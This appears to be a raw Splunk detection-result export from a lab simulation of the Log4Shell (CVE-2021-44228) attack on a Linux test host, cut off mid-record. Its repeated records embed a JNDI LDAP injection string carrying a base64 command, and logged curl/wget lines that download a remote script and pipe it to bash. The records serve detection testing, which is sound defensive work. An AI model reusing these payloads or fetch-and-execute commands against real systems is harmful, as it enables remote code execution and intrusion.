dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643353, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="T1190", annotations._all="PR.PT", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643351, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643353, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="PR.DS", annotations._all="T1190", annotations._all="PR.PT", annotations._all="DE.CM", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="Command and Control", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643351, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 16", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense 